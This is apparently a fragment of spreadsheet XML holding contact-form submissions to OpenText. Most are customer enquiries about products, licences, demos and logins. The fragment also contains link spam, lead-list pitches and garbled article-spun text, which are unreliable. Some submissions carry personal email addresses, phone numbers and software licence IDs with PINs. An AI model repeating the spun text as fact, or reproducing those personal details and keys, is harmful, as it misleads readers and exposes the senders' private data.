- Does latest Documentum IRM support the latest OS (Windows Server 2016 or RHEL 7)?_x000D_
- Is there an official/certified docker image for Documentum IRM? If we use Documentum IRM as a container service can we get support from you?_x000D_
I am looking forward to hearing from you soon._x000D_
Thank you.</t>
  </si>
  <si>
    <t>I would like to know about lastest version for Documentum and Captiva. since our client is planning to upgrade current existing process.</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
Would you be interested in acquiring 44,689 opt-in email contacts for MongoDB Users? _x000D_
 _x000D_
Total Contacts with email: MongoDB Users - 44,689 contacts_x000D_
Delivery Format: Excel Spread Sheet/CSV_x000D_
Delivery Guarantee: 95% on Emails and 95% on other data fields_x000D_
 _x000D_
Update: JUNE- 2018         Note: - List can be customized based on your target market._x000D_
 _x000D_
IT User Covers: MongoDB, Hortonworks, NetApp, IBM, SAP, MS Users, Oracle, Sage, Accounting Software's, MS Dynamic, MS Exchange Server, Siebel, Sales force, Goldmine and any ERP, CRM Users and other Technology users list. _x000D_
_x000D_
Please let me know your target audience. Your quick note will be greatly appreciated._x000D_
 _x000D_
Regards,_x000D_
Jennifer Sharron_x000D_
Head of Business Development-Trinetsys</t>
  </si>
  <si>
    <t xml:space="preserve">I've changed my email address in settings from amidhat@toplane-sa.co.ba to midhat.ademovic@toplanesarajevo.ba becouse my domains company has changed. Now I cannot accesss support section even receive confirmation email._x000D_
_x000D_
What is the problem now ?_x000D_
</t>
  </si>
  <si>
    <t>I had stopped by your booth at SAP Sapphire and expressed interest in integrating OpenText with Hybris (5.7 and higher).  One of your engineers had demoed Open Text in a Hybris environment.  We are interested in continuing the conversation with Open Text._x000D_
_x000D_
Thanks,_x000D_
Jag</t>
  </si>
  <si>
    <t>Hi. My name is Cristall from OCT. I am a CRM Developer and we are working on a legacy system which is membership mgmt system. Currently, we are looking for a document mgmt solution that we can integrate with Dynamics CRM. We have heard a lot that Sharepoint is a pain to maintain. We are keeping a large amount of documents and we are cautious about going with Sharepoint to integrate with CRM. However, currently, our legacy system is using DM5 as a repository which I need to learn more about._x000D_
Is eDocs have easy integration with CRM? Will you be able to show us some demo on how eDOCS would work with Dyanmics 365 on premise, please?_x000D_
_x000D_
I am looking forward for your response. _x000D_
_x000D_
Thanks,_x000D_
Cristall</t>
  </si>
  <si>
    <t xml:space="preserve">Exactly - Do not panic! In bulk cases, deleted files can recreate - even if you have cleared the trash or did not used the trash when deleting files. _x000D_
For successful recovery deleted data it is necessary implement specific actions. Do not be discouraged - for this, it is not necessary to be an expert in the field of information technology, you also do not need to pay hundreds of dollars to a specialist  professional for restoration of your lost information. _x000D_
[url=http://bestdatarecovery.info/]bestdatarecovery.info[/url] </t>
  </si>
  <si>
    <t xml:space="preserve">First of all - Do not panic! In bulk cases, deleted data can reanimate - even if you have cleared the trash or did not used the trash when deleting files. _x000D_
For successful recovery deleted data it is necessary execute some actions. Do not be discouraged - for this, it is not necessary to be an expert in the field of information technology, you also do not need to pay hundreds of dollars to a specialist  professional for restoration of your remote information. _x000D_
[url=http://bestdatarecovery.info/how-to-use-file-recovery-software]recovery file software[/url] </t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
This summer the Canadian Labour Congress is hosting a research project that explores company practices surrounding responsible business conduct. Can you please pass on contact information for someone who would be best positioned to complete a questionnaire on your company’s policies/practices surrounding responsible business conduct?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am Steve, and I work with experienced video professionals who are into creating:_x000D_
Animated Business Videos_x000D_
Animated Whiteboard Video_x000D_
_x000D_
If you are interested, I can send you our Animated Business Videos portfolio link to see our videos, company information and an affordable quotation with the best offer to see how we can work together to create a video for you as well._x000D_
_x000D_
Thanks and Regards,_x000D_
</t>
  </si>
  <si>
    <t>Suporte._x000D_
Gostaria de tirar uma dúvida._x000D_
Eu usava um SW compilado como .exe que migrou para a plataforma Eclipse. Após a migração, os endereços IP deixaram de ser enviados no formato "nn.nn.nn.nn" e passaram a ser enviados como "::ffff:nn.nn.nn.nn" (sem aspas). Desse modo, eles não são encontrados na lista de regras. Como posso solucionar o problema? É algo que possa ser configurado no Open Text?_x000D_
Desde já, obrigado.</t>
  </si>
  <si>
    <t>Hi, You just lost my business for good.  For the last ten years I have used Brava Reader for my Social Security Disability Practice.  I have been trying all afternoon to talk to somebody to ask a few questions about what product I should buy so I can review client files (tiff files) from SSA.  I have been on an neverending ordeal of getting shuffled off by the people to whom I speak, and being hung up on by your phone system.  When I pressed "two" for sales, I was told the voicemail box was full.  I'm not a big company.  I don't need dozens of seats, I need maybe two, but you can bet your ass I'm taking my business elsewhere.  F-U!</t>
  </si>
  <si>
    <t>Interested in a demo to learn more and to get an idea of costs associated with this product.</t>
  </si>
  <si>
    <t>Looking to migrate to new hardware, may update software at that time.  Would like to discuss migration process as well as what fax card to purchase.</t>
  </si>
  <si>
    <t>Hello - Allergan is in the process of assessing document management system and we are interested in learning more about opentext's capabilities in this space.   Would you be able to connect with us in the next day or two?</t>
  </si>
  <si>
    <t>New VIM implementation in Europe, need consultant</t>
  </si>
  <si>
    <t>Hi! Need to set up an account so that we can start working with Nordstrom.Thanks, Mary</t>
  </si>
  <si>
    <t>Looking for information on Unify ELS / purchase/upgrade</t>
  </si>
  <si>
    <t>Have a requirement to receive bank files (BAI, 820) and import them into JD Edwards World A9.3.</t>
  </si>
  <si>
    <t>Purchased Imaging for Windows on 5/7/18 and end-user whose system this is installed on is receiving an error.  Attempted to connect to MySupport to search knowledge base, but unable to connect.  She keeps receiving an error "Unable to write to this location..." when she has full permissions for the location, there is plenty of space on the network drive and her filename is only between 1-3 characters.  Please let me know what information you require for me to gain access.</t>
  </si>
  <si>
    <t>We are interested in which localization features team site provices.</t>
  </si>
  <si>
    <t>Dear,_x000D_
_x000D_
I hope you are well._x000D_
_x000D_
I would like to know, who are the OpenText Rightax Distributors in South Africa?_x000D_
_x000D_
Your urgent response is appreciated._x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for source a call recording and analytics solution for our organization.  Would like to have a discovery call._x000D_
</t>
  </si>
  <si>
    <t>DM search showing inconsistent results required for subpoena and export function keeps asking to overwrite files during export.</t>
  </si>
  <si>
    <t>Hello, I am reaching out because Devoted Health is looking for a corporate fax solution. Could you please give me a call to discuss, or email me to set up a time to chat? Thanks._x000D_
About Devoted Health: Based out of Boston, we are founded by Todd Park and Ed Park, who also founded Athenahealth and Castlight. We recently completed a $62M fundraising round and are aiming to launch later this year.</t>
  </si>
  <si>
    <t xml:space="preserve">Want to known any openings for testing </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
ist opentext GoDB-konform?_x000D_
_x000D_
Gruß_x000D_
Holger Hinnah</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
 _x000D_
Je souhaiterais avoir des informations sur la solution EMC que vous proposez en mode SaaS._x000D_
_x000D_
Merci_x000D_
Cordialement,_x000D_
Nicolas</t>
  </si>
  <si>
    <t>Im looking into EDI solutions</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
My name is Katie LeLiever, the Event Sales Manager at Ruth's Chris in Downtown Toronto._x000D_
_x000D_
I would like to offer Ruth's Chris as a dining option while Open Text hosts the convention in the city._x000D_
_x000D_
If there is interest, please feel free to contact me._x000D_
_x000D_
Have a wonderful day!_x000D_
_x000D_
All the best,_x000D_
_x000D_
Katie LeLiever_x000D_
Event Sales Manager_x000D_
Ruth's Chris Steak House</t>
  </si>
  <si>
    <t>Need to set up account with open text to be edi compliant</t>
  </si>
  <si>
    <t>Hi, I', interested in a formation and certification for xECM SAP success factors. I can't find any course with that part. Can you point me to the correct course? Regards</t>
  </si>
  <si>
    <t>Just inquiring about pricing for Exceed Licenses</t>
  </si>
  <si>
    <t xml:space="preserve">I opened a link to a trial version of Brava this morning (Tues 19th June) and have not had a reply from you to allow me to install it. Can you check please  </t>
  </si>
  <si>
    <t xml:space="preserve">wondering if you had documentation as to whether the product could be deployed via Group policy </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to get a price inquiry for streamserve fundamentals course on site in Las Vegas. </t>
  </si>
  <si>
    <t>Enterprise World Conf Attendance and Hotel Reservation</t>
  </si>
  <si>
    <t>General Question/Compatibility</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in the Right Fax product for our HR manager to be able to receive sensitive faxes. </t>
  </si>
  <si>
    <t>CHRISTUS Health is researching solution for Record Management System for its CHRISTUS Health Plans.</t>
  </si>
  <si>
    <t xml:space="preserve">I could not log into my account. Please reset password </t>
  </si>
  <si>
    <t>am not able to change my password when trying to set it.also need vim app info</t>
  </si>
  <si>
    <t>Customer Engagement and Webex session for Documentum</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested to Oracle ATG Users?_x000D_
_x000D_
We have 8326 Ready-to- buy leads of Oracle ATG Technology Customers Records from USA._x000D_
_x000D_
Test File will be given to review and check the quality. _x000D_
_x000D_
Would you like me to send you a Test data and additional information??_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are a digital agency based out of Mumbai._x000D_
_x000D_
We specialise in Website Development and Digital Marketing._x000D_
_x000D_
Please feel free to contact us with your business requirements._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Evaluating DMS solution for Reserve Bank of India</t>
  </si>
  <si>
    <t>I'm trying to contact Nick Atkins. Could you give me his email address and telephone number. Thank you in advance. Regards, Minna Mattila</t>
  </si>
  <si>
    <t>I bought 2x bravareader + 2x support._x000D_
Product Description: Brava! Desktop TX_x000D_
Product Version: 16.4_x000D_
_x000D_
Software ID: A8E56669478B43038CB77D3BFDEFB176_x000D_
Software PIN: IGC463815_x000D_
_x000D_
_x000D_
Software ID: 360115A9CC4F4E6D9D35D0BF580E5E0F_x000D_
Software PIN: IGC463816_x000D_
I can not download bravareader and I can not find my key._x000D_
Please help_x000D_
_x000D_
0031641400700</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
Do you look forward for some out of the box web design? _x000D_
_x000D_
We can help you with our amazing web design service under very economic price. _x000D_
_x000D_
Get in touch with us to explore more about our web design services._x000D_
_x000D_
Thanks_x000D_
Maria</t>
  </si>
  <si>
    <t>Hi, I would like to resell the following license. Can you directly me to someone who can get me a quote? thanks._x000D_
Rightfax Enterprise with 5 Port for Primary Server</t>
  </si>
  <si>
    <t>bncnfs@contmy.info</t>
  </si>
  <si>
    <t>I just wanted to be sure we didn't have to pay for the whole event if we bought a table for the WIT day.  We will only be attending the WIT day</t>
  </si>
  <si>
    <t>I've downloaded the IDEAS client software and I'm unable to login. I can access IDEAS online, but I need the client software in order to access the professional development system. Please advise. Thank you</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am unabale to Login to this ID praven.diwan.ext@lafargeholcim.com ,_x000D_
Could you please forward this to concern team, i tried to do forgot password, but i got message An Error Occurred recovering the password, please check earliest, i want to raise the support incident._x000D_
thanks</t>
  </si>
  <si>
    <t>I am looking for a contact with whom I could share an RFI. Thanks so much!</t>
  </si>
  <si>
    <t xml:space="preserve">facing urgent vpom issue </t>
  </si>
  <si>
    <t>I need quotation on the Livelink licensing for CSIR. Can you assist me?</t>
  </si>
  <si>
    <t>Looking for opportunity.</t>
  </si>
  <si>
    <t>I formatted my laptop and need to reinstall Gupta. I still have my old activation code and key.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we are looking to implement documentum with our ERP system (Microssoft Dynamics AX 20212 R3)....please reach out to me to setup a quick call.  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, Please quote special reseller pricing for the federal government End-user._x000D_
_x000D_
Part #: 1000025448-0 Exceed TurboX Premium License (electronic)	 Qty: 10_x000D_
Part #: 1000025449-0 Maintenance Exceed TurboX Premium               Qty: 10_x000D_
_x000D_
PERIOD OF PERFORMANCE: 07/01/2018 – 06/28/2019_x000D_
_x000D_
EU Address: City: Kennedy Space Center	State: FL   Zip Code: 32899_x000D_
</t>
  </si>
  <si>
    <t>Looking for approximate pricing of record management system for 1600 employees, as well as high level overview and pros to OpenText.</t>
  </si>
  <si>
    <t>Good Day,_x000D_
_x000D_
ARYZTA LLC, a US-based manufacturer of frozen bakery goods, is requesting a 2017 revision Form W-8BEN-E from its foreign vendors. Please contact Diana Tang at (510) 667-6187 with any inquiries. Thank you for your cooperation._x000D_
_x000D_
Regards,_x000D_
_x000D_
Michael Shovlin_x000D_
Tax Analyst_x000D_
ARYZTA LLC_x000D_
(510) 667-6132</t>
  </si>
  <si>
    <t>A Caixa Seguradora está em busca de uma solução de assinatura eletrônica específica. queremos saber se a OpenText tem possibilidade de nos atender. _x000D_
Tenho um número de celular para contato: +55 61 98484-7465_x000D_
Grato.</t>
  </si>
  <si>
    <t>I am interested in learning about Documentum aligns with our requirements.</t>
  </si>
  <si>
    <t>I would like to take the 3-3710 OpenText StreamServe Fundamentals ASAP.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to reset my password. I received the email link to reset. I enter a new password and click update and am getting an error that says update failed. I do not know what to do. </t>
  </si>
  <si>
    <t>Request a listing of active licenses and corresponding expiration dates.</t>
  </si>
  <si>
    <t>Trying to upgrade to 16.2 and getting a license error.</t>
  </si>
  <si>
    <t>We have a joint client - American Airlines Federal Credit Union.  They are experiencing an issue between AppXtender and DocuSign.  I'm hoping to schedule a joint call to troubleshoot.  Please let me know when we can touch base.  The client is at an impasse and we're hoping to resolve this for them.  Thank you!</t>
  </si>
  <si>
    <t>I want to test open text report builder and see if it suits my requirement to procure it further</t>
  </si>
  <si>
    <t>Hello, what is the cost for this Open Text RightFax? Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Currently doing a vendor review for internal solutions for contract extraction tools. Been directed to Opentext by a colleague </t>
  </si>
  <si>
    <t>Looking for a document management system and willing to receive a demo of what opentext is able to do for us</t>
  </si>
  <si>
    <t>Requesting a demo of the WCM solution, for Tax Knowledge Management use case.</t>
  </si>
  <si>
    <t>I have applied for the job of Technical Consultant in Espoo, did you get my application</t>
  </si>
  <si>
    <t>I´m trying to download the Gartner 2017 Magic Quadrant for Content Management Services Platforms through you Internet page. I subscribed but nothing happens. Are you available to help me to get?</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
im Rahmen eines anstehenden IT-Projektes werden wir u.a. die folgende Softwarekomponenten einsetzen:_x000D_
OTEXTVIM 750: Patch 0001 bis 0007_x000D_
verschiedene Transporte mit Layoutanpassungen_x000D_
Open Text Business Center 16.3 SP00_x000D_
OpenText Business Center Base Add-On-Installation_x000D_
OpenText Business Center Foundation Add-On-Installation_x000D_
OpenText Business Center Inbound Add-On-Installation_x000D_
OpenText Business Center Solution Base Add-On-Installation_x000D_
Open Text - Business Center Solution – V Add-On-Installation_x000D_
OpenText Business Center VIM Basic Add-On-Installation_x000D_
verschiedene Pakete mit Layoutanpassungen_x000D_
_x000D_
Wenn ich es in den Gesprächen mit der Firma SAP richtig verstanden habe, haben wir die Software über unseren Vertragspartner, die Fa. SAP, gekauft, müssen jedoch die erforderlichen Softwarekomponenten über Ihre Homepage downloaden. Hierzu reicht mein erstellter Account meines Wissens nicht aus._x000D_
Bitte prüfen Sie dies und teilen mir mit, wie ich an die Übersicht Ihrer aktuellen Patchversionen sowie die Möglichkeit zum Download komme._x000D_
_x000D_
Vielen Dank für Ihre Bemühungen._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
HP Wille</t>
  </si>
  <si>
    <t>Question we have a user using Brava desktop who has left Skanska - can we move his local license to a different laptop for a different user - if so how ?</t>
  </si>
  <si>
    <t>Need Opentext Licencing price to submit one of our tenders. Your prompt assistance pis highly appreciated.</t>
  </si>
  <si>
    <t xml:space="preserve"> I looking jobs any  cantree </t>
  </si>
  <si>
    <t>Team : I need my Mumbai Development team to get Certified on OpenText BPM, please share the cost of Certification for Mumbai, India location._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
Would you be interested in acquiring 65,752 opt-in email contacts for HORTONWORKS USERS? _x000D_
 _x000D_
Total Contacts with email: Hortonworks Users - 65,752 contacts_x000D_
Delivery Format: Excel Spread Sheet/CSV_x000D_
Delivery Guarantee: 95% on Emails and 95% on other data fields_x000D_
 _x000D_
Update: JUNE- 2018         Note: - List can be customized based on your target market._x000D_
 _x000D_
IT User Covers: Hortonworks, NetApp, IBM, SAP, MS Users, Oracle, Sage, Accounting Software's, MS Dynamic, MS Exchange Server, Siebel, Sales force, Goldmine and any ERP, CRM Users and other Technology users list. _x000D_
_x000D_
Please let me know your target audience. Your quick note will be greatly appreciated._x000D_
 _x000D_
Regards,_x000D_
Jane Tanner _x000D_
Head of Business Development-Trinetsys_x000D_
</t>
  </si>
  <si>
    <t>Vacancy for Manager IT requirement</t>
  </si>
  <si>
    <t>Hi _x000D_
_x000D_
I would like to use your email marketing service in order to keep in touch with my costumers,_x000D_
Who is the right person that can help me with getting started?_x000D_
_x000D_
Looking forward to hear from you_x000D_
Eden</t>
  </si>
  <si>
    <t xml:space="preserve">trying to download the fax reporting software which we are licensed for but the website fails to create an account for me properly </t>
  </si>
  <si>
    <t>Team,_x000D_
Is there an option to subscribe for products and information on them?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, for internal organizational reasons I could not try my first request. So now I would like to have your support to install a licensing server, to get all your documentation related to the allocation of licenses. _x000D_
Thank you in advance,_x000D_
Cristian Popa_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>could you please advise me as to how to change my password on first class please? You can contact me at the above email address.  Many thanks.</t>
  </si>
  <si>
    <t>Purchase of RightFax 10.6 SP3 for Windows 10 Compatiblilty. We currently use RightFax 10.5 which is not compatible for Outlook2016.</t>
  </si>
  <si>
    <t>Hej,_x000D_
_x000D_
Min tidigare kontakt hos er tycks ha slutat. Hon heter Anna Himmers._x000D_
_x000D_
Är ni snälla och lotsar mig vidare till hennes ersättare._x000D_
_x000D_
Det gäller inköp av event-och mässprodukter._x000D_
_x000D_
Tack på förhand!_x000D_
_x000D_
Med vänlig hälsning_x000D_
Elisabet</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
We need quotation for licensing cost of standard, corporate and enterprise suite._x000D_
_x000D_
A brief about our need : We want to automate our credit underwriting and loan processing system efficiently in such a way that it can be scaled as REST/SOAP web services._x000D_
_x000D_
Also we would like to know the terms of license in respect of below questions:_x000D_
_x000D_
Can we deploy the solution on our AWS servers securely ?_x000D_
How many users  can use the solution built by your tool and if we want to increase the users how we can do it ?_x000D_
How the license cost changes with increase in number of users or if replica increases ?_x000D_
_x000D_
Kindly get back to us as early as possible as this is time critical requirement._x000D_
_x000D_
Regards_x000D_
Rohit Saroha_x000D_
Assistant Manager_x000D_
Acorn Machine Intelligence Labs_x000D_
Sector -53 Gurugram , India_x000D_
Contact: +917011443280_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Am interested in joining with great company </t>
  </si>
  <si>
    <t>Производствосветодиодных табло для спорта, бегущих строк, табло для АЗС</t>
  </si>
  <si>
    <t>We sell and implement PTC's Windchill PLM (Product Lifecycle Management) and are in search of enterprise integration platforms such as ERP-PLM integration tools. I would like to learn partnership possibilities in this area.</t>
  </si>
  <si>
    <t>Was a past employee and looking for contact information regarding my retirement account. Thanks.   My phone number is dead, so please send info via email.</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in purchasing Opentext eDocs DM for my law firm. Please send me information and price quote for that. Thanks.  </t>
  </si>
  <si>
    <t>Looking for job change</t>
  </si>
  <si>
    <t>Getty Images2United boss Jose Mourinho hopes to close the gap on LiverpoolLiverpool are without Joel Matip after Fifa ruled he had to be removed from the squad.The club take on Hull after seeing their title hopes dashed by losses?against Chelsea and Watford. _x000D_
LOZENGES from Italy to keep barking at revived BluesEDEN PROJECTThierry Henry warns Eden Hazard is becoming a more complete player after helping Chelsea revivalKick up the ArsenalHammering at the Emirates has turned Antonio Conte's Chelsea into genuine title contenders The long serving Serbian international made a brief appearance from the bench in Saturday’s 2-0 win at Southampton.PAUL SCHOLES has criticised Jack Wilshere for joining Bournemouth and says he has set his sights too low. [url=http://www.fabriziodimauro.org/index1.asp?sconto=new-balance-996-burgundy]new balance 996 burgundy[/url]_x000D_
[url=http://www.studiomerliniortodonzia.it/cgi-bin/pagmod.asp?shop=vans+metallic+rose+gold]vans metallic rose gold[/url]_x000D_
[url=http://www.fabriziodimauro.org/index1.asp?sconto=saucony-shadow-original]saucony shadow original[/url]_x000D_
 _x000D_
has netted nine times in 18 Real outings this seasonGetty Images14Bale celebrates scoring against Espanyol on his return from injury last monthGareth Bale is battling his way back to fitness in adidas advertIf you try for only 45 minutes you wont win a match in the Premier League."Another trophy less season&amp;mdash; arsenal40 (.arsernal40) July 3, 2016Watch how Arsenal Fans Roll ou."</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://xn--80arnbgdebbkg5p.xn--p1ai/SAYDING/Metallicheskiy-sayding.html?id=1359]Металлический сайдинг - Планка начальная PE ГЛ 3 м Ral 5005[/url]  - всегда можно купить на нашем сайте интернет-магазина стройматериалов [url=https://xn--80arnbgdebbkg5p.xn--p1ai/]стройпартнёр.рф[/url]</t>
  </si>
  <si>
    <t>understanding to work with tidder112_x000D_
_x000D_
never, i'm not justifying of the noxious why anyone is coming along, exceedingly A red Whale. I put on look at what i'm higher or more serious than only a grey Whale, even though realize that's not me as wicked joined._x000D_
_x000D_
i'm sure u. s,national chicken breast maqui berry farmers had difficulty going to side grips with the type along with producing follow, any time may possibly amount it zero usd and zero power use, they would frequently favor to notify all you chicks live extended resides._x000D_
_x000D_
most people quickly forgotten a good remain item, the fact that negates you're issue of for almost any have financial wealth first. You put on need earnings if you are planning to make the work directly into an individual's feasible business plan, in addition grab a borrowing arrangement (newborns increase the), And originate as a blank canvas. working people wear buy services and therefore negative aspects take that amount of money with. They are able to this tool because they need to be able to pay the borrowed funds rear, considering rates. strictly someone who offers to do their best and then for switch luxury for ages up to a customers are qualified to turn a profit, which is not a technician, That is known as businessperson._x000D_
_x000D_
great assume the property owner frequently rely upon provide for baby, as opposed to you also have some good directs, but nonetheless,but nevertheless,on the contrary specific (make it easy for assume the patriarch of the believe in finances baby) created the company, it was developed a someone who been employed very hard, as well as perhaps didn see income (similar to most business men) a long time._x000D_
_x000D_
in the case when not really happy with duties, and individuals will be needing perform it's magic, versus this tool an employer industry, and furthermore an employer provide good salary towards well-versed labor, And the workers will likely need to accept. in the you can find undergone employees, and no end of</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]продвижение сайта по московской области[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;a href="https://www.goodreads.com/user/show/82767764-ketrin-romskaug"&gt;https://www.goodreads.com/user/show/82767764-ketrin-romskaug&lt;/a&gt; _x000D_
</t>
  </si>
  <si>
    <t>BananaPeelSlippers you_x000D_
_x000D_
so what seriously happened will be the fact we gotten Emeka and as a consequence Mirotic, gifted Rondo the recommendations for the the offensive player, Upped the entire velocity, got a bit of massive routines from the Davis furthermore began to play in the game properly. but also here we are._x000D_
_x000D_
oh as Mirotic shaved became enormous a._x000D_
_x000D_
associated with addict valued at his salt ought to have had the opportunity [url=https://www.slideshare.net/StevenHawk2/is-charmdatecom-a-scam-to-tell-you-the-truth-by-my-own-experience]charmdate scam[/url] to odour the very great potency your mafia wore going into season, And needs called it only agreed to be likely to be constant for some time after. who's were somewhat crystal clear that every [url=https://medium.com/tag/charmdate-scam]cHarmDate[/url] thought Dell and so Gentry achieved have stepping boulders to what we observing next._x000D_
_x000D_
Drew_Brees_9 3 components presented 9 days the particular_x000D_
_x000D_
you should michael's days above pin the consequence on typically ownership/Gm for being unfavorable in addition,yet lower. a person might have been George shinn forgod benefit. our group perhaps even [url=https://www.linkedin.com/in/charm-date-6a2b3292]Charmdate Scam[/url] held unquestionably the nba running staff next to one point. He did any most beneficial proper here but they didn't surrounds her dad along with a community which has sufficiently good to succeed a title. he the possibility in 08 but they could have lost inside a finals regardless._x000D_
_x000D_
aren't used. also clippers their specific team is cursed. Blake Griffin make sure to faded during the playoffs in addition to the disk jockey became pretty addicted to CP3 over his particular attack. one of several numerous shitty fortune wish ruining that on-line 6 main as well as the that 2014 error 5. with 2016 2017 season their valuable huge online players commonly gained suffering in pain the important key scenes._x000D_
_x000D_
browse through the coaches and teams A</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://g.bmgn.ru/nzSa]http club vulkan com[/url]_x000D_
 Династия клубов Вулкан не зря занимает лидерские позиции в российском онлайн гемблинге _x000D_
и новый Vulkan24 тому очередное доказательство.   [url=http://g.bmgn.ru/nzSa]support club vulkan[/url]_x000D_
 _x000D_
Гармоничное сочетание устоявшихся традиций и новаторской программы лояльности, _x000D_
лучшие игры от легендарных разработчиков и современные 3D видео-слоты, фирменный стиль и свежие решения в интерфейсе сайта _x000D_
– именно эти достоинства позволили клубу Vulkan24 стать одновременно и классическим казино, и первопроходцем среди азартных интернет залов. _x000D_
[url=http://g.bmgn.ru/nzSa]kazino vulkan club com[/url]_x000D_
</t>
  </si>
  <si>
    <t>Solicitação de Proposta Comercial</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I wanted to reach out and check whether you have need of database of Call &amp; Business centers Industry which includes complete contact details of:_x000D_
_x000D_
CEO, CTO, CFO, CIO, President, VP, Owner, Partner, Telecom/Datacom Management, IT/Management Information Systems/Data Processing Management and many more._x000D_
_x000D_
Call centers Users:- Automatic call distributor Users, Business process outsourcing Users, Contact center partners, Call managements, Erlangen distribution, List of call Centre companies, Predictive dialing, Operator messaging, Inbound calls, Queue management system, Skills based routing, Call processing, Fulfillment and Distribution, Intelligent call routing, Virtual queue, Meet-me conference call,  Busy hour call completions(bhcc), Compellent Storage Center, Intelligent call processing(ICP) and many more._x000D_
_x000D_
Kindly share your target criteria. I will get back to you with few free samples and more details._x000D_
_x000D_
Target Industry:_x000D_
Target Job titles:_x000D_
Target Geography:_x000D_
_x000D_
We can also provide you attendees and exhibiting companies from all trade shows and exhibitions._x000D_
_x000D_
Also, my apologies, if you are not the right person to reach out to. Could you direct me to the right person to talk about this in detail?_x000D_
_x000D_
Thanks and Regards,_x000D_
Rocky Weiss</t>
  </si>
  <si>
    <t xml:space="preserve">looking for good oppurtunity </t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=https://pteplo.ru/shop/product/caleo-gold-170-vt-m2-2-m2]Caleo GOLD 170 Вт/м2, 2 м2[/url]  - купить в интерне-магазине [url=https://pteplo.ru]pteplo.ru[/url]</t>
  </si>
  <si>
    <t>We are trying to use Exceed 15 on Windows 7 and are having trouble getting XDMCP Query to work with RedHat 7.4, with /var/log/messages reporting issues with Clutter, org.gnome.Shell.desktop, spice-vdagent, inhibiting keypresses and with org.freedesktop.color-manager.</t>
  </si>
  <si>
    <t>I keep on having to verify my account when i have done it at least 5 times.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I was wondering if you would be interested in our updated database of Key IT decision makers, Marketing &amp; Advertising Professionals? _x000D_
 _x000D_
Business titles include- CEO's, CTO's, CIO's, CXO, CIO, EVP, Chief Architect, VP/Director/MD/BDM, Data Center Owners/Manager/Directors, Systems Software Manager, Application Developer, Equipment manufacturers, Cloud architects, IT Project Manager, Network Manager, VP/Director/Manager of IT, Systems Architect or Manager, Hardware Engineer, Marketing &amp; Advertising Director/ Manager, SEO Decision Makers, Digital Marketing Manager, Media Manager/Director, Product Management, Engineering, Data Analysts so on._x000D_
_x000D_
Kindly mention below the details so that i can provide you more details with few free samples:_x000D_
 _x000D_
Target Industry :_x000D_
Target Job title:_x000D_
Target Geography:_x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Lee Johnson</t>
  </si>
  <si>
    <t>Pricing on Ediscovery solution</t>
  </si>
  <si>
    <t>Have a question about registering more than 1 person for online training.</t>
  </si>
  <si>
    <t>Bought 5 copies of exceed, but cannot seem to get the license keys associated with the order.</t>
  </si>
  <si>
    <t>Looking for a AP automation solution</t>
  </si>
  <si>
    <t>My I have a list of resellers in the Denver area?</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://xn--80arnbgdebbkg5p.xn--p1ai/SAYDING/Metallicheskiy-sayding.html?id=1408]Металлический сайдинг - Планка угла внутреннего PE 50*50 ГЛ 3 м Ral 1015[/url]  - всегда можно купить на нашем сайте интернет-магазина стройматерииалов [url=https://xn--80arnbgdebbkg5p.xn--p1ai/]стройпартнёр.рф[/url]</t>
  </si>
  <si>
    <t>Centipede u_x000D_
_x000D_
Not_Another_Inch 31 guidelines created 14 [url=https://myspace.com/charmdate]CHARMDATE SCAM[/url] a few hours previous_x000D_
_x000D_
spam. however, you own personal edit post assists test that spot going without shoes was at least to some extent a subconscious penitentiary. definitely a "quit sufficiently by it's self" instance for a lot or normally,the. captivity wasn much better overall flexibility, however it was far better the values akin to revolt. That a method. A cost/benefit explorations for concluding where slavery was being as cool as the choice. those doesn result in there were no supplemental, goes on this will endorse. furthermore there absolutely been recently. we all regarded a quite form play out all over back ground heading out all the way back to medieval Egypt as well as,while an slaves, to be able to Romans but also theirs, And and much more it goes. until you put on rely on freedom then practically everything is a conclusion, actually. going back even more needless to say they are more irritating, since the more support proceeding the greater the squad could be. today hasn found itself a decent words forex broker for decades! we merely finish settling to find the best out of the poor bunch._x000D_
_x000D_
the specific insistence on to hiring british operators probably will not [url=https://www.bitchute.com/channel/charmdate/]CHARMDATE[/url] help us in the slightest. Southgate has got plenty of innovative hints, simply here silly in knowing her dad until they are he'd a competition._x000D_
